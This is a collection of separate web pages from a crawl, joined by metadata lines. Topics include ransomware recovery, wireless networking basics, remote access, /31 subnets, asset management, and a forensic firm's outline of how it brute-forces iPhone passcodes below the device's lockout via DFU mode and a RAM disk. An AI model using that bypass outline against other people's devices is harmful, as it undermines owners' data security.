Ransomware Removal – What to do After a Ransomware Attack
If the worst happens and individual company devices or even your entire network is compromised by ransomware, there are a few recovery options available.
Common strategies for ransomware removal include:
- Attempting to remove ransomware using software
- Paying the ransom
- Resetting infected devices to factory mode
It’s not recommended you pay the ransom. Cybercriminals cannot be trusted to decrypt and return access to the data, even after you’ve paid. And at worst, you may even be listed as a target for future malware attacks, if malicious actors know you’re likely to give in to their demands.
Plus, successful ransomware attacks only encourage more criminals to enter a potentially lucrative space, worsening the problem for everyone.
Instead, restrict network access to any compromised devices – and those displaying suspicious behavior – and aim to stop the further spread of the ransomware.
Tips for ransomware removal include:
- Reboot to safe mode – depending on the type of ransomware, rebooting the device and restarting it in safe mode can halt the spread. Although some trojans like ‘REvil’ and ‘Snatch’ can operate during a safe-mode boot, this isn’t true of all ransomware and safe mode can buy you valuable time to install anti-malware software. However, it’s important to note that any encrypted files will remain encrypted even in safe mode and will need to be restored via data backup.
- Install anti-ransomware software – once the infected device(s) have been identified and disconnected from the network, the ransomware needs to be removed using anti-malware software. If you attempt business as usual before the devices are fully decrypted, you risk a resurgence of the undetected malware, resulting in further spread and more compromised files.
- Scan for ransomware programs – when you believe your devices are clear of any ransomware or other worms, make sure you scan the system – both by manually searching for any suspicious behaviour like file extension changes, and using next-generation firewalls. A thorough scan should reveal any hidden trojans that could wreak havoc again once you restore your computer.
- Restore the computer – businesses should always keep backups of their files, isolated away from the network. This way, any encrypted files can be quickly restored from a safe source once the ransomware is removed, minimising downtime and disruption.
- Report the attack to law enforcement – ransomware attackers are cybercriminals. Any attack needs to be documented and reported – it shouldn’t be something companies simply let slide once they’ve managed to restore their devices. Log screenshots or take pictures of any ransom notes and gather all available evidence – like emails or websites that could potentially be the source of the malicious malware – and report the breach as soon as possible. You can report ransomware to:
- About Ransomware:
- Ransomware Protection: | <urn:uuid:f8acc438-4182-41f7-a196-238223dffa30> | CC-MAIN-2022-40 | https://www.crowdstrike.com/cybersecurity-101/ransomware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00715.warc.gz | en | 0.91119 | 2,833 | 3.125 | 3 |
1234, 0000, 2580, 1111, 5555, 2222, and 1212 –Whilst not the strongest of PIN passcodes, statistics show that these are amongst the most common codes used by mobile phone users worldwide. There are limitations posed by the Pin Lock feature, as those of you who have enquired with us regarding the Apple iPhone would be aware. The level of background security developed by Apple has proven troublesome for digital forensic experts and law enforcement worldwide. The US National Security Agency has recently marketed the Smartphone as secure for governmental use, after many failed attempts at accessing the device. You’ll now find that UK government departments and many top commercial organisations have ditched their existing Blackberry Smartphones for the Apple iPhone. But why is the iPhone’s security so good? And what can IntaForensics do to try and bypass it?
Back in 2007, the original iPhone was laughed at by the hacking community for its poor implementation of security features. Essentially, every application written by Apple ran with “Root” privileges, allowing complete control over the entire phone. Therefore, hackers could access and take over the phone from the inside. This was rectified the following year, and since then, Apple has built upon the security of its Smartphone, changing the way apps are programmed and introducing additional security features year on year. This makes it one of the most secure Smartphones on the market.
The iPhone has always included the PIN lock feature, but only since the 3GS has this feature been a strong enough to prevent serious attacks. Developments in both hardware and software on an annual basis continue to strengthen the link between the two and in turn improve upon its security. Apple have implemented an optional feature within the iOS devices, the device can automatically wipe itself after a certain number of failed PIN attempts. This reduces the risk of information being leaked if the iOS device is lost or stolen. Because of this feature, specific mobile forensic equipment is necessary for safe access to the data.
This hardware security involves the incorporation of the AES encryption algorithm. AES encryption has been used since the 90’s and is widely known as the most secure form of encryption available, adopted by the US National Security Agency for encrypting classified data. It is widely thought that no computer for the foreseeable future would be able to guarantee breaking the random 256bit AES key in a realistic timescale.
Apple has stated that the AES key within each iPhone or iPad is unique to each device, and is considered to be a truly random key generated by the systems random number generator. This unique key is not recorded by Apple or any of its suppliers to maintain total security. Apple updated the use of AES encryption by placing the hardware that encrypts the data between the Flash storage and the iPhones main memory, meaning that when data is requested from the internal flash memory it is automatically decrypted and then encrypted when saved back to it. In addition, the AES 256 keys are fused into the application processor during manufacturing. Apple burns these keys into the silicon preventing them from being tampered with or bypassed. Only the AES engine can access this.
What we do
Recovery of iPhone, iPad and iPod Touch passcodes is possible on a number of models, but not all. Data is recovered by first entering the device into DFU (Device Firmware Update) mode. This is a mode primarily used to connect to iTunes to allow for updating firmware on devices which have become corrupt. From DFU mode, an exploit is used in combination with a custom kernel and a RAM disk. This exploit is very similar to how a handset is “jailbroken”, the main difference being that all data is being loaded into RAM and not onto the handsets internal memory. This allows for tools to be executed to create a physical image of the device, recover the devices secret files and brute force the device passcode in order to bypass it.
Brute-Force is a method of attempting every single passcode from 0000 to 9999 on the handset. The passcode is brute-forced on a level lower than the operating system with far greater speed. If you were to manually brute force the password on the device it would automatically lock the handset after 10 unsuccessful attempts. Or, if the user has it setup the option to automatically erase the phone, this would also occur. Using the RAM disk bypasses this limitation. If time is important then it is possible to bypass a passcode completely, this is particularly useful on devices with a complex passcode set.
The extraction of data from iOS devices in undoubtedly a complex and dynamic process, and with ever changing security being implemented, the IntaForensics team have to be on the ball with new iOS software and hardware releases. Although access to the phone varies on the device, it is important to keep your information secure.
If you’re interested in finding out whether the IntaForensics experts could help you with Mobile Phone Analysis or Data Recovery, simply give us a call on 0845 009 2600. You can also send us an email at firstname.lastname@example.org with further details about your enquiry, and we’ll be in touch as soon as possible. | <urn:uuid:331f2ef6-9044-4113-9203-066d8f63f9ac> | CC-MAIN-2022-40 | https://www.intaforensics.com/2012/12/10/cracking-apples-iphone-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00715.warc.gz | en | 0.946295 | 1,063 | 2.671875 | 3 |
Cisco CCNA 802.11 Topology Building Blocks
Following is a summary of the different WLAN topologies:
Ad hoc mode: This mode is called Independent Basic Service Set (IBSS). Mobile clients connect directly without an intermediate access point. Operating systems such as Windows have made this peer-to-peer network easy to set up. This setup can be used for a small office (or home office) to allow a laptop to be connected to the main PC or for several people to simply share files. The coverage is limited. Everyone must be able to hear everyone else. An access point is not required. A problem is that peer-to-peer networks are difficult to secure.
Infrastructure mode: In infrastructure mode, where clients connect through an access point, there are two modes:
– Basic Service Set (BSS): The communication devices that create a BSS are mobile clients using a single access point for connectivity to each other or to wired network resources. This should not be confused with the Basic Service Set Identifier (BSSID) which is only the layer 2 MAC address of the BSS access point’s radio card. While the BSS is the single building block for wireless topology and the BSS access point is uniquely identified through a BSSID, the wireless network itself is advertised through a Service Set Identifier (SSID). The SSID is a wireless network name that is user configurable. The SSID can be made up of as many as 32 case sensitive characters to announce the availability of the wireless network to mobile clients.
– Extended Services Set (ESS): The wireless topology is extended with two or more Basic Service Sets connected by a distribution system (DS) or commonly a wired infrastructure. An ESS generally includes a common SSID to allow roaming from access point to access point without requiring client configuration.
These are the original standard define 802.11 topologies while other topologies such as repeaters, bridges, and work group bridges are vendor specific extensions.
Cisco CCNA BSA Wireless Topology—Basic Coverage
The physical area of radio frequency (RF) coverage provided by an access point in a BSS is known as the basic service area (BSA). This area can is dependant on the RF created with variations caused by access point power output, antenna type, and physical surroundings effecting the RF. While the BSS is the topology building block and the BSA is the actual coverage pattern, there terminology usage are commonly interchangeable for basic wireless discussions.
The access point attaches to the Ethernet backbone and communicates with all the wireless devices in the cell area. The access point is the master for the cell and controls traffic flow to and from the network. The remote devices do not communicate directly with each other; they communicate with the access point. The access point is user configurable with it’s unique RF channel and wireless SSID name.
The access point broadcasts the name of the wireless cell in the SSID through beacons. Beacons are broadcasts that the access points send to announce the available services. It is used to logically separate WLANs. It must match exactly between the client and the access point. However clients can be configured without an SSID (null-SSID), detect all access points, and learn the SSID from the beacons of the access point. A common example of the discovery process is used by the integrated Windows Zero Configuration (WZC) utility when using a wireless laptop at a new location. The user is simply displayed the newly found wireless service and ask to connect or supply appropriate keying material to join. SSID broadcasts can be disabled on the access point but this approach does not work if the client needs to see the SSID in the beacon.
Cisco CCNA ESA Wireless Topology— Extended Cover
If a single cell does not provide enough coverage, any number of cells can be added to extend the range. This range is known as an extended service area (ESA).
It is recommended that the ESA cells have 10 to 15 percent overlap to allow remote users to roam without losing RF connections. For wireless voice networks, an overlap of 15 to 20 percent is recommended. Bordering cells should be set to different non-overlapping channels for best performance.
Cisco CCNA Wireless Topology Data Rates—802.11b
WLAN clients have the ability to shift data rates while moving. This technique allows the same client operating at 11 Mbps to shift to 5.5 Mbps, 2 Mbps, and finally still communicate in the outside ring at 1 Mbps. This rate shifting happens without losing the connection and without any interaction from the user. Rate shifting also happens on a transmission-by-transmission basis; therefore, the access point has the ability to support multiple clients at multiple speeds depending upon the location of each client.
– Higher data rates require stronger signals at the receiver. Therefore, lower data rates have a greater range.
– Wireless clients always try to communicate with the highest possible data rate.
– The client will reduce the data rate only if transmission errors and transmission retries occur.
This approach provides the highest total throughput within the wireless cell. The above visual is for 802.11b, however the same concept applies to 802.11a or 802.11g data rates.
Cisco CCNA Access Point Configuration
Wireless access points can be configured through a command line interface or more commonly a browser GUI. However, the mode of configuration the basic wireless parameters are the same. Basic wireless access point parameters are SSID, RF channel with optional power, and authentication (security) while wireless client basic parameters only include authentication. Wireless clients need less parameters since the wireless NIC will scan all available RF it’s capable of (meaning an 802.11b/g card can not scan 5 GHz) to locate the RF channel and will usually initiate the connection with a null-SSID to discover the SSIDs available. Therefore by 802.11 design if using open authentication, the result is plug-n-play. When security is configured with Pre-Shared Keys (PSK) for older WEP or current WPA, remember they must be an exact match to allow connectivity.
Depending on the hardware chosen for the access point, it might be capable of both frequencies of 2.4 GHz ISM band and 5 GHz UNII band and all three IEEE 802.11a/b/g implementations. This result will usually allow for fine adjustment of which frequencies to offer through which radio to enable and which IEEE standard to use on that RF. While the details of this related to items such as 802.11b/g Mode versus 802.11g Mode only are not applicable for this course, a basic summary should be observed. When 802.11b wireless clients are mixed with 802.11g wireless clients, the resulting throughput decreases since the access point must start implemented a protection RTS/CTS protocol. Hence if you simply to only one IEEE wireless client type, throughput will be greater than in a mixed mode.
After configuring the basic required wireless parameters of the access point, additional fundamental wired side parameters must be configured for default router and DHCP server. Given a pre-existing LAN, there must be a default router to exit the network and a DHCP server to lease IP addresses to wired PCs. The access point simply uses the existing router and DHCP servers for relaying IP address to wireless clients. Since the network has been expanded, verify the existing DHCP IP address scope is large enough to accommodate the new wireless client additions. If this is a new installation with all router and access point functions in the same hardware, then you simple configure all parameter in the same hardware.
Cisco CCNA Steps to Implement a Wireless Network
The basic approach to wireless implementation (as with any basic networking) is to gradually configure and test incrementally.
Before any wireless, verify pre-exiting network and internet access for the wired hosts. Then implement wireless with only a single access point and single client without wireless security. Verify the wireless client receives a DHCP IP address and can ping the local wired default router and then browse to the external Internet. Lastly, configure wireless security with WPA. Only use WEP if hardware equipment is too old to support WPA.
Cisco CCNA Common Wireless Network Issues
If you follow the prior stated steps for implementing wireless network, the divide and conquer technique via incremental configuration will most likely lead to most likely cause. Most common configuration issues are :
-Configuring a defined SSID on the client (versus it’s discovery method of SSID) that does not match access point (inclusive of case sensitivity).
-Configuring incompatible security methods. Both wireless client and access point must match for authentication method (EAP or PSK) and encryption method (TKIP or AES).
Other common problems resulting from initial RF installation:
– Is the radio enabled on both the access point and client for the correct RF (2.4 GHz ISM or 5 GHz UNII)?
– Is an external antenna connected and facing correct direction (straight upward for dipole)?
– Is the antenna location too high or too low relative to wireless clients (within 20 vertical feet)?
-Metal object in the room reflecting RF and causing poor performance ?
-Attempting to reach too great of a distance capable ? | <urn:uuid:dd247541-3177-4240-b131-7ff4312b26c0> | CC-MAIN-2022-40 | https://www.certificationkits.com/cisco-certification/cisco-ccna-640-802-exam-certification-guide/cisco-ccna-wireless-part-ii/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00115.warc.gz | en | 0.894714 | 1,915 | 3 | 3 |
New technology. New cyber threats. New security breaches.
Cyber threats have become a recurring occurrence and common news nowadays. Every year, new cyber security threats are coming up. And as we begin the promising year of 2021, we need to steel ourselves for the new cyber threats.
To protect yourself against such cyber attacks, you need to implement foolproof cybersecurity systems to keep the hackers out. However, it’s easier said than done.
To enforce a security system customized to sensitive data, you need to understand what really happens during a cybersecurity attack. This blog will take you through the journey of cyber attacks, the information that can be tapped, and the risks involved.
The Journey of a Cyber Attack – The Possibilities of Security Breaches
Anyone can be a victim of a cyber attack. Just last year, the hackers even stole from the U.S. Customs and Border Protection and so there’s no telling when or who might be attacked next.
Our cybersecurity service experts at Corpus Christi have prevented many such attacks with our firewall protection and data security support. We also offer data security along with managed IT services for businesses in Corpus Christi to protect themselves against cyber threats.
Let’s jump right in and what the hackers do during a cyber attack and how you need to protect yourself.
Hackers Spot the Vulnerabilities
Many cyber-attacks happen because hackers spot a security vulnerability and exploit it. This vulnerability can be in any form — by brute-forcing the password, eavesdropping on the communications, extracting personal information through phishing attacks, and many more.
Often, such vulnerabilities are the silliest mistakes made by the employees, like using the most obvious password, accessing the official data from the home network that doesn’t have security, or leaving the system logged in at the end of the day.
The hackers find such loopholes in the website or the server and add a piece of their code to try and crack the vulnerability wide open. They may also inject malware or ransomware through the gaps in the system security.
Businesses Panic & Lose Evidence
As the data security of a business is compromised, people begin to panic.
They make absurd actions that they would never do in full consciousness otherwise and this leads to even bigger problems. Some companies make the mistake of not assessing the level of attacks or prioritizing the wrong thing to do. Often, one common mistake many makes is deleting the evidence of the attack, which is most valuable to assess and prevent future attacks.
This is why every business needs a cyberattack recovery plan in place. In times of panic, the security team can refer to this plan and start taking the steps one by one.
This recovery plan should be detailed, containing the complete SOP to identify and fix the vulnerability as soon as possible. While we can never predict what the cyber attack can be, it’s important to cover all possible grounds for the threats in the recovery plan. The recovery plan should also insist on the team save the evidence before deleting the other files.
There are often a few important people who must be informed when there’s a cyber attack. For instance, when a data manager is informed of the attack, the person will initiate a risk management plan to backup the sensitive data and increase the security around it.
Similarly, several people in the organization should be kept in loop about the cyber attack. However, many teams, in the frenzy of saving the situation, fail to communicate properly or be prejudiced in the communication. This could complicate and even open the data up for more risk.
The best way to tackle this issue — train the team for clear, quick, factful communication of the situation.
The Hackers Meanwhile Try Penetrating Deeper
See, there’s one thing about the hackers. Even if you keep enforcing more firewalls to keep the hackers out, they’ll keep trying and trying until they find another loophole.
What can you do during such times?
Keep enforcing better security continually without resting for a minute even when it looks like the hacker is giving up. You may never know how and where the hacker can attack next. In the meantime, collect enough evidence about the attack which may give you an idea into the attack and take necessary steps.
While not all cyber attacks have a direct impact on an organization, it can send the wrong message out to the public. The best way to do this is to analyze the attack once everything has calmed down and performed a complete, scrutinized security audit to identify and fix any other loopholes.
Doesn’t it look like a total mess in the face of a cyber attack?
Well, this is the common reality of many organizations when a hacker tries to gain access. You can avoid such frenzied mistakes and miscommunications during a cyber-attack by creating a risk management and recovery plan.
Even better, you can improve your data security, conduct regular audits, and get the help of a company offering security services in Corpus Christi like LayerOne Networks. Our managed IT services for companies in Corpus Christi provides a wholesome solution for maintaining security, identifying the cyber threats and loopholes even before the hackers do, and fixing them.
Contact us to find out how we can make your systems secure. | <urn:uuid:0e6299b3-bb7b-4397-8c2f-b15597e066cd> | CC-MAIN-2022-40 | https://l1n.com/what-really-happens-during-a-cyber-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00115.warc.gz | en | 0.942075 | 1,083 | 2.59375 | 3 |
“…Christensen says they have been able to identify unique characteristics of buildings that point to stylistic influences beyond any initial blueprints.”
An art history academic is using computer vision to gather new insights into the creative forces behind architecture.
Writing for The Conversation, Peter Christensen, an Assistant Professor of Art History at the University of Rochester, says that he was inspired by the emergence of facial recognition technology. One particular inciting incident got him going, when the face-tagging feature of his iPhone confused one of his friends with the famous Great Mosque of Cordoba.
As he tells it, Christensen began to realize that this kind of computer vision technology could be used to look at buildings in new ways. He started “[t]hinking about buildings as objects with biometric identities,” and worked with a research team to build 3D scanning systems that could create digital mockups of buildings that could then be analyzed in a process “similar to facial recognition”.
In this way, Christensen says they have been able to identify unique characteristics of buildings that point to stylistic influences beyond any initial blueprints. Looking at railway stations built by foreign workers from a range of backgrounds in Canada in the late 19th century, for example, the researchers can use this technology to discover beveling on window frames or pointed arches that offer hints about who was working on these particular aspects of a building.
It’s a particularly niche example of how computer vision technologies have evolved to help people process visual data in new ways – to see the world, in other words. And while some facial recognition technology remains lamentably inaccurate in matching human faces, at least such inaccuracies can offer some surprising new insights in other applications.
Source: The Conversation (via CNN)
July 26, 2018 – by Alex Perala | <urn:uuid:52897ecb-76e4-47d5-ac98-113e1e962b04> | CC-MAIN-2022-40 | https://findbiometrics.com/face-scanning-tech-architecture-507265/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00115.warc.gz | en | 0.959042 | 374 | 3.34375 | 3 |
Thursday, September 29, 2022
Published 2 Years Ago on Monday, Aug 10 2020 By Mounir Jamil
As the COVID-19 pandemic continues, public transport needs to adapt to a new normal and start adopting greener technologies that will render it resilient to future disasters, according to a report by the Asian Development Bank (ADB). The report – Guidance Note on COVID-19 and Transport in Asia and the Pacific illustrates the impact of COVID-19 on transport, as lockdowns forced millions of people to begin working remotely, schools to shift to e-learning and customers to resort to online shopping and food delivery.
While notions of public transport have been previously perceived as mostly green, affordable, and efficient means of travel, initial trends in cities that have re-opened indicate that public transport is still considered relatively unsafe, and is not bouncing back as quickly as cycling, walking or private vehicles.
Further impact of COVID-19 on transport have manifested as drastic lockdown measures around the globe brought world economies to their knees. Satellite footage recorded data on how concentrations of CO2 and air pollutants fell drastically, bringing clear blue skies to some cities. However, as cities reopened, traffic levels have increased. If this trend continues on a wider scale, it could remove decades of effort that have been put into promoting sustainable development. As public transport reopens, confidence of passengers can be restored through health and safety measures like cleaning, tracking, face covering and thermal scanning
As some countries are starting to enter the recovery phase, further precautionary and preventive operating measures and advanced technology can be implemented to enable contactless process and ease an agile response. Demand management steps can ease crowd control in public transport and in airports. Government initiatives and financial aid are critical during this period to enable public transport to continue supporting the movement of passengers and goods in a sustainable way.
Even during its current winter state, the crypto world is still alive. New buyers are still coming in, maybe not as before, but still, some are committed to buying the dip. The Crypto wallet conversation is one to be had when venturing into the crypto world. Between the crypto physical wallet and its virtual counterpart […]
Stay tuned with our weekly newsletter on all telecom and tech related news.
© Copyright 2022, All Rights Reserved | <urn:uuid:42d37651-4716-45e4-94ea-94775ce57cdb> | CC-MAIN-2022-40 | https://insidetelecom.com/the-impact-of-covid-19-on-transport/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00115.warc.gz | en | 0.952212 | 485 | 2.734375 | 3 |
How do you supply clean water to a city beneath the sea?
Waternet in Amsterdam, NL depends upon IBM Maximo® Enterprise Asset Management
You drink it, grow with it, clean with it and use it to transport goods. Fresh, clean water is essential to life on our planet. So when you’re responsible for water for over one million people who are living below sea level, you can’t afford to take risks. This is why Waternet in Amsterdam, NL depends upon IBM Maximo® Enterprise Asset Management (EAM), bolstered by the expertise of their local IBM Business Partner, ZNAPZ.
The Netherlands is especially sensitive to water issues
Neder lands, or lower countries: the very name of this nation describes its topology. Only about 50% of the land is more than a meter (39.4 inches) above sea level. These areas, called polders, were originally reclaimed from swamps, lakes and ponds in the 16th century. Over the centuries, the polders have expanded exponentially. Their fertile soil has made the Netherlands the world’s second largest exporter of food and agricultural products, including the glorious tulip. In 1637, a single bulb cost ten times the salary of a skilled worker. Today, expansive fields of these beautiful, affordable blossoms are synonymous with the Dutch.
Fed by canals that also serve as transportation lanes, the agricultural industry, and the nation’s economy, are critically dependent upon water.
To complicate matters further, the Netherlands is a relatively small country that is home to a population of over 17 million people. It’s one of the most densely inhabited countries in the world. And each individual uses an average of 150 liters (33 gallons) of water each day.
With so much at stake, the uninterrupted availability of clean, fresh water is of paramount importance to the Dutch. The people in the Amsterdam region entrust their needs to the 1,800 talented professionals at Waternet.
Waternet manages thousands of assets each day
Unlike most water management organizations in Holland, Waternet manages the entire water lifecycle. They produce clean, fresh tap water. They make certain that wastewater and rainwater flow into the sewer system, and they treat it before they release it back into nature.
The company also monitors surface water to ensure it’s at the right levels. And they maintain dykes, clean the canals and maintain an unobstructed and uninterrupted water flow.
This is a monumental task that requires the continuous functioning of thousands of units, such as sensors, monitors, pumps, trucks, bridges, sluices and dredges. As Louis van Parera of Waternet says, “We run assets and these assets have to perform.”
To maintain their reliability and functionality, Waternet depends upon ZNAPZ and IBM Maximo enterprise asset management solutions.
IBM Maximo EAM helps keep the taps in Amsterdam flowing
IBM Maximo is the world’s leading enterprise asset management solution. Waternet has depended upon their EAM installation for over 15 years.
IBM Maximo, IoT collects data from people, sensors and devices. It analyzes it to provide the insights that decision-makers need to make optimize operations. So rather than plan asset maintenance according to calendars, as in the past, users are able to schedule maintenance based on specific criteria for each individual unit.
The IBM Maximo solution is compatible with all asset types no matter where they reside. It allows users to set up new assets quickly, and upgrade EAM software automatically. The result is real-time visibility, non-stop uptime, reduced costs and minimized risk.
It’s not simply implementation, it’s a view to the future
To optimize their EAM system and to shepherd it to maturity, Waternet depends upon IBM Business Partner, ZNAPZ. As ZNAPZ Solution Architect Jan-Willem Steur tells us, their job isn’t restricted to examining today’s needs. It also requires that they look ahead and plan for the future – and not only in terms of assets. “The predictive nature isn’t just related to assets. It’s about a question of where the entire project is going.”
If your future includes enterprise asset management, you’ll want to learn more about IBM Maximo. I suggest you begin your journey by watching this informative interview with professionals from Waternet and ZNAPZ.
Learn more about Maximo | <urn:uuid:b0a0e7e5-3afe-401f-a7be-135c9157a320> | CC-MAIN-2022-40 | https://www.ibm.com/blogs/internet-of-things/ibm-maximo-amsterdam/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00115.warc.gz | en | 0.928665 | 938 | 2.671875 | 3 |
What is Remote Access? Connect Your Computer from Anywhere
Remote Access Definition
Remote access refers to when you have the ability to access a different computer or network in another place. Remote computer access is often used to enable people to access important files and software on another user’s computer.
With remote access, a user can monitor, maintain, and control devices as long as they are connected to the same network. This opens up the possibility to troubleshoot issues without being in the same physical location as the device with the problem.
Remote access also enables you to access necessary files without having them sent via email or other means. You can also define who has the rights to the files, as well as organize users into different categories, giving some groups access to certain things while limiting the access of others.
What is Remote Desktop Access
Remote desktop access describes software that allows access to someone’s personal computer desktop by another user. During the interaction, the other user can see the target desktop on their own device.
What Is Unattended Remote Access?
In an unattended remote access setup, you can access someone else's computer or server without them having to sit in front of it.
How Does Remote Computer Access Work?
A remote access connection gives users the power to connect to a private network from a different location. Both users have to connect to the same network.
Once both are connected to the remote access network, a protocol governed by access software interfaces that user's device with another user's device. The protocol gives one device the ability to access the functions of the target computer or server. This allows the keyboard, trackpad, touchscreen, or mouse of the controlling user to manipulate the target device.
How To Gain Remote Access To Another Computer and What Are the Protocols?
Although there are different remote access protocols, three of the most often used types of remote access are:
- Virtual private network (VPN)
- Virtual network computing (VNC)
- Remote Desktop Protocol (RDP)
Some remote access methods involve limited access or sharing of resources, but VPNs, VNCs, and RDPs allow users to both gain access to and have full control over another person’s computer via a remote network.
Virtual Private Network or VPN
A VPN provides users with the ability to send and receive data between devices or via a private network that is extended over a public network. To gain access to another’s computer, both have to be connected to the same VPN and running the same access software.
Virtual Network Computing or VNC
With VNC, you have a graphical system through which users can share desktops. Whatever the remote user does on their keyboard or mouse gets sent to the other device, controlling it as if the person were sitting in front of it while also allowing the accessing user to see what they are doing on their own screen.
Remote Desktop Protocol or RDP
RDP is a program by Microsoft that provides a user with a graphical interface to connect with another computer via a network connection. The user utilizes the RDP client software while the other person’s computer runs the RDP software.
Internet Proxy Servers
With internet proxy servers, a server performs the function of a go-between, allowing you to connect with another computer within the proxy server environment. Both computers connect to the same proxy server, and one user then gains access to the other’s computer.
What Are the Other Types of Remote Access?
There are other ways to access the information of another person’s computer, and each allows for different levels of control and data sharing.
- Cellular internet service connects two devices via a wireless connection
- Cable broadband allows users to share bandwidth with each other
- Digital subscriber line (DSL) makes use of a telephone network
- Fiber optics broadband uses a fiber connection to transfer large amounts of data quickly
- Satellite makes use of satellites to enable devices to connect through the internet
- Local-area network/wide-area network (LAN/WAN) involves making use of an encrypted network that connects users who sign in to it
- Desktop sharing involves software that allows people to share their desktop with several other people at once
- Private access management (PAM) consists of tools that make sure only the right people have access to certain files and apps on a network
- Vendor privileged access management (VPAM) enables secure sharing over a network controlled by an outside vendor that limits connection privileges
What is Remote Desktop Access
A Remote Access Connection Manager (RasMan) is a service provided by Windows that manages VPN connections between your computer and the internet.
The Remote Access Connection Manager works by giving users the ability to organize RDP connections in groups. To make the group, the user initiates a “New” command from the File menu and is then guided through the creation of a group file.
Remote Access Security Best Practices
When engaging in remote access, regardless of the protocol, it is important to remember that your computer will be exposed to at least one other user. Because files can be transferred from one computer to another, the possibilities for the transfer of malware exist, as well as unacceptable access by an intruder. Here are some best practices to ensure remote access security.
- Use endpoint protection: Endpoint security makes sure each device involved in the remote connection is safe. It typically involves antivirus software, firewalls, and other measures.
- Use a secure connection: Public Wi-Fi can put both users at risk. A secure, trusted connection allows for a direct link that excludes unauthorized users.
- Use complex passwords: Use passwords with at least eight characters and a combination of numbers, symbols, and upper- and lower-case letters.
- Use multi-factor authentication (MFA): Multi-factor authentication, such as a username and a password coupled with biometrics or text messaging, adds an extra layer a bad actor would have to negotiate to gain access.
- Use an account lockout policy: If someone enters the wrong password a certain number of times, an account lockout policy can bar them from trying to connect again.
- Regularly update your software: Keeping your software up to date can keep your computer safe from new malicious viruses or malware.
- Limit how many users can use the service: The more users, the more potential access points for hackers or malware. Cutting down the number of users reduces the chances of infiltration.
Is Remote Access Safe and When Should You Use It?
With proper endpoint protection, multi-factor authentication, passwords, and software, remote access can be a safe way to connect two devices. It is important to keep an eye out for threats that may be particularly dangerous when two devices are connected remotely.
A Trojan horse, for example, would be easy to get from one device to another, and it could go undetected because it often appears harmless. Similarly, a Remote Access Trojan (RAT) can gain access to a machine and provide control to the remote hacker. The RAT can let an intruder access files and gain complete control of the device.
It is important to also be careful of dangers that could be spread accidentally through files sent from one computer to the other. Some of these include viruses, spyware, and other malware.
Remote Computer Access Solutions
Fortinet offers methods of remote access using a secure VPN connection. Protected by FortiGate, remote workers can access each other’s computers as well as those of internal workers safely and efficiently. The FortiGate VM next-generation firewall (NGFW) can support IPsec VPN traffic at speeds up to 20 Gbps. This enables seamless remote access without time-consuming glitches or delays.
Remote access lets you connect to another person’s computer and use it as if you were sitting in front of it yourself. The image of the other device’s desktop appears on your device, and your actions on your device can be used to control the other device almost as easily as if you were physically at the device.
The connection happens over remote access protocols, such as a virtual private network (VPN), virtual network computing (VNC), or Remote Desktop Protocol (RDP). Both users have to interface with the protocol for the connection to be successful, and both devices have to be compatible with the service. You can also connect using services like cable or fiber broadband, cellular service, or privileged access management (PAM).
It is critical to put security measures in place whenever you use remote access. Some best practices include endpoint protection, complex passwords, multi-factor authentication, updating your software, and limiting the number of users who can use the service. FortiGate provides users with a fast connection using VM next-generation firewall (NGFW) to enhance both security and effectiveness. | <urn:uuid:15a25b5b-d2c6-4eb1-a23c-29a722639dda> | CC-MAIN-2022-40 | https://www.fortinet.com/ru/resources/cyberglossary/remote-access | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00115.warc.gz | en | 0.920088 | 1,810 | 3.9375 | 4 |
PTP LINKS (POINT TO POINT LINKS)
31-bit Subnet Mask (/31)
We can configure any external interface to use an IPv4 address with a 31-bit subnet mask. A 31-bit subnet mask is often used for an interface that is the endpoint of a point-to-point network. The use of 31-bit subnet masks for IPv4 point-to-point links is described in RFC 3021.
Router A is connected via Fast-ethernet 0/0 having ip 192.168.0.0/31 to Fast-ethernet 0/0 having ip 192.168.0.1/31 of Router B.
R1(config)#int fa 0/0
R1(config-if)#ip add 192.168.0.0 255.255.255.254
% Warning: use /31 mask on non point-to-point interface cautiously
Thirty-one-bit subnets were first proposed in RFC 3021, which was primarily motivated by the potential for public address space conservation. Recall that shrinking a /30 subnet to a /31 effectively doubles the number of point-to-point links you can address from a finite range. Cisco IOS has supported /31 subnets for point-to-point links since release 12.2(2) T. We can put this theory into practice by addressing a point-to-point connection between two routers as 192.168.0.0/31. An ominous warning message, no doubt, but it works just fine. We can successfully ping the far-end interface and the subnet is accurately reflected in the routing table:
R1# ping 192.168.0.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echo to 192.168.0.1, timeout is 2 seconds:
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/16/20 ms
Related: Point to Point subnet
R1# show ip route
192.168.0.0/31 is subnetted, 1 subnets
C 192.168.0.0 is directly connected, FastEthernet0/0
At this juncture, one might think of using 32-bit Subnet Mask (/32) for each side of PTP links. The answer is no. Below excerpt describes why /32 IP address at each side of PTP links is not possible.
A 32-bit subnet mask defines a network with only one IP address. In mixed routing mode, you can only configure a 32-bit subnet mask for a physical external interface. Because you cannot configure a virtual external interface with a default gateway on a different subnet, you cannot use a /32 subnet mask for a virtual external interface, such as a VLAN or Link Aggregation interface. | <urn:uuid:8b80a456-ee11-4818-b6ba-6364ccf0ead7> | CC-MAIN-2022-40 | https://ipwithease.com/ptp-links-of-31-subnet/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00115.warc.gz | en | 0.891722 | 626 | 3.21875 | 3 |
